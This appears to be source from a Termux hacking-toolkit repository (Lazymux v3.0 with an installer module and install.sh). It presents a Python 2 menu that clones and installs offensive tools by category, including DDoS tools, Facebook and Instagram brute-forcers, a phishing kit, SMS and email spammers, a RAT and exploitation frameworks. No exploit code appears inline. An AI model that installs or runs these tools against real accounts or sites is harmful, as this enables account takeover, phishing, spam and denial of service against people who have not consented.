def ubuntu(): 634 | print '\n###### Installing Ubuntu' 635 | os.system('apt update && apt upgrade') 636 | os.system('apt install python2 git') 637 | os.system('git clone https://github.com/Neo-Oli/termux-ubuntu') 638 | os.system('mv termux-ubuntu ~ && cd ~/termux-ubuntu && bash ubuntu.sh') 639 | print '###### Done' 640 | backtomenu_option() 641 | 642 | def fedora(): 643 | print '\n###### Installing Fedora' 644 | os.system('apt update && apt upgrade') 645 | os.system('apt install wget git') 646 | os.system('wget https://raw.githubusercontent.com/nmilosev/termux-fedora/master/termux-fedora.sh') 647 | os.system('mv termux-fedora.sh ~') 648 | print '###### Done' 649 | backtomenu_option() 650 | 651 | def nethunter(): 652 | print '\n###### Installing Kali NetHunter' 653 | os.system('apt update && apt upgrade') 654 | os.system('apt install git') 655 | os.system('git clone https://github.com/Hax4us/Nethunter-In-Termux') 656 | os.system('mv Nethunter-In-Termux ~') 657 | print '###### Done' 658 | backtomenu_option() 659 | 660 | def blackbox(): 661 | print '\n###### Installing BlackBox' 662 | os.system('apt update && apt upgrade') 663 | os.system('apt install python2 git && pip2 install optparse passlib') 664 | os.system('git clone https://github.com/jothatron/blackbox') 665 | os.system('mv blackbox ~') 666 | print '###### Done' 667 | backtomenu_option() 668 | 669 | def xattacker(): 670 | print '\n###### Installing XAttacker' 671 | os.system('apt update && apt upgrade') 672 | os.system('apt install git perl') 673 | os.system('cpnm install HTTP::Request') 674 | os.system('cpnm install LWP::Useragent') 675 | os.system('git clone https://github.com/Moham3dRiahi/XAttacker') 676 | os.system('mv XAttacker ~') 677 | print '###### Done' 678 | backtomenu_option() 679 | 680 | def vcrt(): 681 | print '\n###### Installing VCRT' 682 | os.system('apt update && apt upgrade') 683 | os.system('apt install python2 git') 684 | os.system('git clone https://github.com/LOoLzeC/Evil-create-framework') 685 | os.system('mv Evil-create-framework ~') 686 | print '###### Done' 687 | backtomenu_option() 688 | 689 | def socfish(): 690 | print '\n###### Installing SocialFish' 691 | os.system('apt update && apt upgrade') 692 | os.system('apt install python2 git && pip2 install wget') 693 | os.system('git clone https://github.com/UndeadSec/SocialFish') 694 | os.system('mv SocialFish ~') 695 | print '###### Done' 696 | backtomenu_option() 697 | 698 | def ecode(): 699 | print '\n###### Installing ECode' 700 | os.system('apt update && apt upgrade') 701 | os.system('apt install php git') 702 | os.system('git clone https://github.com/Cvar1984/Ecode') 703 | os.system('mv Ecode ~') 704 | print '###### Done' 705 | backtomenu_option() 706 | 707 | def hashzer(): 708 | print '\n###### Installing Hashzer' 709 | os.system('apt update && apt upgrade') 710 | os.system('apt install git python2') 711 | os.system('pip2 install requests') 712 | os.system('git clone https://github.com/Anb3rSecID/Hashzer') 713 | os.system('mv Hashzer ~') 714 | print '###### Done' 715 | backtomenu_option() 716 | 717 | def xsstrike(): 718 | print '\n###### Installing XSStrike' 719 | os.system('apt update && apt upgrade') 720 | os.system('apt install git python2') 721 | os.system('pip2 install fuzzywuzzy prettytable mechanize HTMLParser') 722 | os.system('git clone https://github.com/UltimateHackers/XSStrike') 723 | os.system('mv XSStrike ~') 724 | print '###### Done' 725 | backtomenu_option() 726 | 727 | def breacher(): 728 | print '\n###### Installing Breacher' 729 | os.system('apt update && apt upgrade') 730 | os.system('apt install git python2') 731 | os.system('pip2 install requests argparse') 732 | os.system('git clone https://github.com/UltimateHackers/Breacher') 733 | os.system('mv Breacher ~') 734 | print '###### Done' 735 | backtomenu_option() 736 | 737 | def stylemux(): 738 | print '\n###### Installing Termux-Styling' 739 | os.system('apt update && apt upgrade') 740 | os.system('apt install git') 741 | os.system('git clone https://github.com/BagazMukti/Termux-Styling-Shell-Script') 742 | os.system('mv Termux-Styling-Shell-Script ~') 743 | print '###### Done' 744 | backtomenu_option() 745 | 746 | def txtool(): 747 | print '\n###### Installing TXTool' 748 | os.system('apt update && apt upgrade') 749 | os.system('apt install git python2 nmap php curl') 750 | os.system('pip2 install requests') 751 | os.system('git clone https://github.com/kuburan/txtool') 752 | os.system('mv txtool ~') 753 | print '###### Done' 754 | backtomenu_option() 755 | 756 | def passgencvar(): 757 | print '\n###### Installing PassGen' 758 | os.system('apt update && apt upgrade') 759 | os.system('apt install git php') 760 | os.system('git clone https://github.com/Cvar1984/PassGen') 761 | os.system('mv PassGen ~') 762 | print '###### Done' 763 | backtomenu_option() 764 | 765 | def owscan(): 766 | print '\n###### Installing OWScan' 767 | os.system('apt update && apt upgrade') 768 | os.system('apt install git php') 769 | os.system('git clone https://github.com/Gameye98/OWScan') 770 | os.system('mv OWScan ~') 771 | print '###### Done' 772 | backtomenu_option() 773 | 774 | def sanlen(): 775 | print '\n###### Installing santet-online' 776 | os.system('apt update && apt upgrade') 777 | os.system('apt install git python2 && pip2 install requests') 778 | os.system('git clone https://github.com/Gameye98/santet-online') 779 | os.system('mv santet-online ~') 780 | print '###### Done' 781 | backtomenu_option() 782 | 783 | def spazsms(): 784 | print '\n###### Installing SpazSMS' 785 | os.system('apt update && apt upgrade') 786 | os.system('apt install git python2 && pip2 install requests') 787 | os.system('git clone https://github.com/Gameye98/SpazSMS') 788 | os.system('mv SpazSMS ~') 789 | print '###### Done' 790 | backtomenu_option() 791 | -------------------------------------------------------------------------------- /core/lzmcore.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ha3MrX/Hacking/6f627008fcd072278ae3041b19d540b86577b2e6/core/lzmcore.pyc -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | apt-get upgrade && apt-get update 2 | apt-get install git -y 3 | apt-get install python -y && apt-get install python2 -y 4 | apt-get install hydra -y 5 | apt-get install figlet -y 6 | apt-get dist-upgrade 7 | figlet Tools is Installed 8 | echo How to use Ha3MrX 9 | echo Command : python Ha3Mrx.py 10 | -------------------------------------------------------------------------------- /lazymux.py: -------------------------------------------------------------------------------- 1 | ## lazymux.py - Lazymux v3.0 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sys 5 | from time import sleep as timeout 6 | from core.lzmcore import * 7 | 8 | def main(): 9 | banner() 10 | print " [01] Information Gathering" 11 | print " [02] Vulnerability Scanner" 12 | print " [03] Stress Testing" 13 | print " [04] Password Attacks" 14 | print " [05] Web Hacking" 15 | print " [06] Exploitation Tools" 16 | print " [07] Sniffing & Spoofing" 17 | print " [08] Other\n" 18 | print " [10] Exit the Lazymux\n" 19 | lazymux = raw_input("lzmx > ") 20 | 21 | if lazymux == "1" or lazymux == "01": 22 | print "\n [01] Nmap" 23 | print " [02] Red Hawk" 24 | print " [03] D-Tect" 25 | print " [04] sqlmap" 26 | print " [05] Infoga" 27 | print " [06] ReconDog" 28 | print " [07] AndroZenmap" 29 | print " [08] sqlmate" 30 | print " [09] AstraNmap" 31 | print " [10] WTF" 32 | print " [11] Easymap" 33 | print " [12] BlackBox" 34 | print " [13] XD3v" 35 | print " [14] Crips" 36 | print " [15] SIR" 37 | print " [16] EvilURL" 38 | print " [17] Striker" 39 | print " [18] Xshell" 40 | print " [19] OWScan\n" 41 | print " [00] Back to main menu\n" 42 | infogathering = raw_input("lzmx > ") 43 | 44 | if infogathering == "01" or infogathering == "1": 45 | nmap() 46 | elif infogathering == "02" or infogathering == "2": 47 | red_hawk() 48 | elif infogathering == "03" or infogathering == "3": 49 | dtect() 50 | elif infogathering == "04" or infogathering == "4": 51 | sqlmap() 52 | elif infogathering == "05" or infogathering == "5": 53 | infoga() 54 | elif infogathering == "06" or infogathering == "6": 55 | reconDog() 56 | elif infogathering == "07" or infogathering == "7": 57 | androZenmap() 58 | elif infogathering == "08" or infogathering == "8": 59 | sqlmate() 60 | elif infogathering == "09" or infogathering == "9": 61 | astraNmap() 62 | elif infogathering == "10": 63 | wtf() 64 | elif infogathering == "11": 65 | easyMap() 66 | elif infogathering == "12": 67 | blackbox() 68 | elif infogathering == "13": 69 | xd3v() 70 | elif infogathering == "14": 71 | crips() 72 | elif infogathering == "15": 73 | sir() 74 | elif infogathering == "16": 75 | evilURL() 76 | elif infogathering == "17": 77 | striker() 78 | elif infogathering == "18": 79 | xshell() 80 | elif infogathering == "19": 81 | owscan() 82 | elif infogathering == "00" or infogathering == "0": 83 | restart_program() 84 | else: 85 | print "\nERROR: Wrong Input" 86 | timeout(2) 87 | restart_program() 88 | 89 | elif lazymux == "2" or lazymux == "02": 90 | print "\n [01] Nmap" 91 | print " [02] AndroZenmap" 92 | print " [03] AstraNmap" 93 | print " [04] Easymap" 94 | print " [05] Red Hawk" 95 | print " [06] D-Tect" 96 | print " [07] Damn Small SQLi Scanner" 97 | print " [08] SQLiv" 98 | print " [09] sqlmap" 99 | print " [10] sqlscan" 100 | print " [11] Wordpresscan" 101 | print " [12] WPScan" 102 | print " [13] sqlmate" 103 | print " [14] wordpresscan" 104 | print " [15] WTF" 105 | print " [16] Rang3r" 106 | print " [17] Striker" 107 | print " [18] Routersploit" 108 | print " [19] Xshell" 109 | print " [20] SH33LL" 110 | print " [21] BlackBox" 111 | print " [22] XAttacker" 112 | print " [23] OWScan\n" 113 | print " [00] Back to main menu\n" 114 | vulnscan = raw_input("lzmx > ") 115 | 116 | if vulnscan == "01" or vulnscan == "1": 117 | nmap() 118 | elif vulnscan == "02" or vulnscan == "2": 119 | androZenmap() 120 | elif vulnscan == "03" or vulnscan == "3": 121 | astraNmap() 122 | elif vulnscan == "04" or vulnscan == "4": 123 | easyMap() 124 | elif vulnscan == "05" or vulnscan == "5": 125 | red_hawk() 126 | elif vulnscan == "06" or vulnscan == "6": 127 | dtect() 128 | elif vulnscan == "07" or vulnscan == "7": 129 | dsss() 130 | elif vulnscan == "08" or vulnscan == "8": 131 | sqliv() 132 | elif vulnscan == "09" or vulnscan == "9": 133 | sqlmap() 134 | elif vulnscan == "10": 135 | sqlscan() 136 | elif vulnscan == "11": 137 | wordpreSScan() 138 | elif vulnscan == "12": 139 | wpscan() 140 | elif vulnscan == "13": 141 | sqlmate() 142 | elif vulnscan == "14": 143 | wordpresscan() 144 | elif vulnscan == "15": 145 | wtf() 146 | elif vulnscan == "16": 147 | rang3r() 148 | elif vulnscan == "17": 149 | striker() 150 | elif vulnscan == "18": 151 | routersploit() 152 | elif vulnscan == "19": 153 | xshell() 154 | elif vulnscan == "20": 155 | sh33ll() 156 | elif vulnscan == "21": 157 | blackbox() 158 | elif vulnscan == "22": 159 | xattacker() 160 | elif vulnscan == "23": 161 | owscan() 162 | elif vulnscan == "00" or vulnscan == "0": 163 | restart_program() 164 | else: 165 | print "\nERROR: Wrong Input" 166 | timeout(2) 167 | restart_program() 168 | 169 | elif lazymux == "3" or lazymux == "03": 170 | print "\n [01] Torshammer" 171 | print " [02] Slowloris" 172 | print " [03] Fl00d & Fl00d2" 173 | print " [04] GoldenEye" 174 | print " [05] Xerxes" 175 | print " [06] Planetwork-DDOS" 176 | print " [07] Hydra" 177 | print " [08] Black Hydra" 178 | print " [09] Xshell" 179 | print " [10] santet-online\n" 180 | print " [00] Back to main menu\n" 181 | stresstest = raw_input("lzmx > ") 182 | 183 | if stresstest == "01" or stresstest == "1": 184 | torshammer() 185 | elif stresstest == "02" or stresstest == "2": 186 | slowloris() 187 | elif stresstest == "03" or stresstest == "3": 188 | fl00d12() 189 | elif stresstest == "04" or stresstest == "4": 190 | goldeneye() 191 | elif stresstest == "05" or stresstest == "5": 192 | xerxes() 193 | elif stresstest == "06" or stresstest == "6": 194 | planetwork_ddos() 195 | elif stresstest == "07" or stresstest == "7": 196 | hydra() 197 | elif stresstest == "08" or stresstest == "8": 198 | black_hydra() 199 | elif stresstest == "09" or stresstest == "9": 200 | xshell() 201 | elif stresstest == "10": 202 | sanlen() 203 | elif stresstest == "00" or stresstest == "0": 204 | restart_program() 205 | else: 206 | print "\nERROR: Wrong Input" 207 | timeout(2) 208 | restart_program() 209 | 210 | elif lazymux == "4" or lazymux == "04": 211 | print "\n [01] Hydra" 212 | print " [02] Facebook Brute Force" 213 | print " [03] Facebook Brute Force 2" 214 | print " [04] Facebook Brute Force 3" 215 | print " [05] Black Hydra" 216 | print " [06] Hash Buster" 217 | print " [07] 1337Hash" 218 | print " [08] Cupp" 219 | print " [09] InstaHack" 220 | print " [10] Indonesian Wordlist" 221 | print " [11] Xshell" 222 | print " [12] Social-Engineering" 223 | print " [13] BlackBox" 224 | print " [14] Hashzer\n" 225 | print " [00] Back to main menu\n" 226 | passtak = raw_input("lzmx > ") 227 | 228 | if passtak == "01" or passtak == "1": 229 | hydra() 230 | elif passtak == "02" or passtak == "2": 231 | facebook_bruteForce() 232 | elif passtak == "03" or passtak == "3": 233 | facebook_BruteForce() 234 | elif passtak == "04" or passtak == "4": 235 | fbBrute() 236 | elif passtak == "05" or passtak == "5": 237 | black_hydra() 238 | elif passtak == "06" or passtak == "6": 239 | hash_buster() 240 | elif passtak == "07" or passtak == "7": 241 | leethash() 242 | elif passtak == "08" or passtak == "8": 243 | cupp() 244 | elif passtak == "09" or passtak == "9": 245 | instaHack() 246 | elif passtak == "10": 247 | indonesian_wordlist() 248 | elif passtak == "11": 249 | xshell() 250 | elif passtak == "12": 251 | social() 252 | elif passtak == "13": 253 | blackbox() 254 | elif passtak == "14": 255 | hashzer() 256 | elif passtak == "00" or passtak == "0": 257 | restart_program() 258 | else: 259 | print "\nERROR: Wrong Input" 260 | timeout(2) 261 | restart_program() 262 | 263 | elif lazymux == "5" or lazymux == "05": 264 | print "\n [01] sqlmap" 265 | print " [02] Webdav" 266 | print " [03] xGans" 267 | print " [04] Webdav Mass Exploit" 268 | print " [05] WPSploit" 269 | print " [06] sqldump" 270 | print " [07] Websploit" 271 | print " [08] sqlmate" 272 | print " [09] sqlokmed" 273 | print " [10] zones" 274 | print " [11] Xshell" 275 | print " [12] SH33LL" 276 | print " [13] XAttacker" 277 | print " [14] XSStrike" 278 | print " [15] Breacher" 279 | print " [16] OWScan\n" 280 | print " [00] Back to main menu\n" 281 | webhack = raw_input("lzmx > ") 282 | 283 | if webhack == "01" or webhack == "1": 284 | sqlmap() 285 | elif webhack == "02" or webhack == "2": 286 | webdav() 287 | elif webhack == "03" or webhack == "3": 288 | xGans() 289 | elif webhack == "04" or webhack == "4": 290 | webmassploit() 291 | elif webhack == "05" or webhack == "5": 292 | wpsploit() 293 | elif webhack == "06" or webhack == "6": 294 | sqldump() 295 | elif webhack == "07" or webhack == "7": 296 | websploit() 297 | elif webhack == "08" or webhack == "8": 298 | sqlmate() 299 | elif webhack == "09" or webhack == "9": 300 | sqlokmed() 301 | elif webhack == "10": 302 | zones() 303 | elif webhack == "11": 304 | xshell() 305 | elif webhack == "12": 306 | sh33ll() 307 | elif webhack == "13": 308 | xattacker() 309 | elif webhack == "14": 310 | xsstrike() 311 | elif webhack == "15": 312 | breacher() 313 | elif webhack == "16": 314 | owscan() 315 | elif webhack == "00" or webhack == "0": 316 | restart_program() 317 | else: 318 | print "\nERROR: Wrong Input" 319 | timeout(2) 320 | restart_program() 321 | elif lazymux == "6" or lazymux == "06": 322 | print "\n [01] Metasploit" 323 | print " [02] commix" 324 | print " [03] sqlmap" 325 | print " [04] Brutal" 326 | print " [05] A-Rat" 327 | print " [06] WPSploit" 328 | print " [07] Websploit" 329 | print " [08] Routersploit" 330 | print " [09] BlackBox" 331 | print " [10] XAttacker" 332 | print " [11] TXTool\n" 333 | print " [00] Back to main menu\n" 334 | exploitool = raw_input("lzmx > ") 335 | 336 | if exploitool == "01" or exploitool == "1": 337 | metasploit() 338 | elif exploitool == "02" or exploitool == "2": 339 | commix() 340 | elif exploitool == "03" or exploitool == "3": 341 | sqlmap() 342 | elif exploitool == "04" or exploitool == "4": 343 | brutal() 344 | elif exploitool == "05" or exploitool == "5": 345 | a_rat() 346 | elif exploitool == "06" or exploitool == "6": 347 | wpsploit() 348 | elif exploitool == "07" or exploitool == "7": 349 | websploit() 350 | elif exploitool == "08" or exploitool == "8": 351 | routersploit() 352 | elif exploitool == "09" or exploitool == "9": 353 | blackbox() 354 | elif exploitool == "10": 355 | xattacker() 356 | elif exploitool == "11": 357 | txtool() 358 | elif exploitool == "00" or exploitool == "0": 359 | restart_program() 360 | else: 361 | print "\nERROR: Wrong Input" 362 | timeout(2) 363 | restart_program() 364 | elif lazymux == "7" or lazymux == "07": 365 | print "\n [01] KnockMail" 366 | print " [02] Spammer-Grab" 367 | print " [03] Hac" 368 | print " [04] Spammer-Email" 369 | print " [05] SocialFish" 370 | print " [06] santet-online" 371 | print " [07] SpazSMS\n" 372 | print " [00] Back to main menu\n" 373 | sspoof = raw_input("lzmx > ") 374 | 375 | if sspoof == "01" or sspoof == "1": 376 | knockmail() 377 | elif sspoof == "02" or sspoof == "2": 378 | spammer_grab() 379 | elif sspoof == "03" or sspoof == "3": 380 | hac() 381 | elif sspoof == "04" or sspoof == "4": 382 | spammer_email() 383 | elif sspoof == "05" or sspoof == "5": 384 | socfish() 385 | elif sspoof == "06" or sspoof == "6": 386 | sanlen() 387 | elif sspoof == "07" or sspoof == "7": 388 | spazsms() 389 | elif sspoof == "00" or sspoof == "0": 390 | restart_program() 391 | else: 392 | print "\nERROR: Wrong Input" 393 | timeout(2) 394 | restart_program() 395 | 396 | elif lazymux == "8" or lazymux == "08": 397 | print "\n [01] SpiderBot" 398 | print " [02] Ngrok" 399 | print " [03] Sudo" 400 | print " [04] Ubuntu" 401 | print " [05] Fedora" 402 | print " [06] Kali Nethunter" 403 | print " [07] VCRT" 404 | print " [08] E-Code" 405 | print " [09] Termux-Styling" 406 | print " [10] PassGen\n" 407 | print " [00] Back to main menu\n" 408 | moretool = raw_input("lzmx > ") 409 | 410 | if moretool == "01" or moretool == "1": 411 | spiderbot() 412 | elif moretool == "02" or moretool == "2": 413 | ngrok() 414 | elif moretool == "03" or moretool == "3": 415 | sudo() 416 | elif moretool == "04" or moretool == "4": 417 | ubuntu() 418 | elif moretool == "05" or moretool == "5": 419 | fedora() 420 | elif moretool == "06" or moretool == "6": 421 | nethunter() 422 | elif moretool == "07" or moretool == "7": 423 | vcrt() 424 | elif moretool == "08" or moretool == "8": 425 | ecode() 426 | elif moretool == "09" or moretool == "9": 427 | stylemux() 428 | elif moretool == "10": 429 | passgencvar() 430 | elif moretool == "00" or moretool == "0": 431 | restart_program() 432 | else: 433 | print "\nERROR: Wrong Input" 434 | timeout(2) 435 | restart_program() 436 | 437 | elif lazymux == "10": 438 | sys.exit() 439 | 440 | else: 441 | print "\nERROR: Wrong Input" 442 | timeout(2) 443 | restart_program() 444 | 445 | if __name__ == "__main__": 446 | main() --------------------------------------------------------------------------------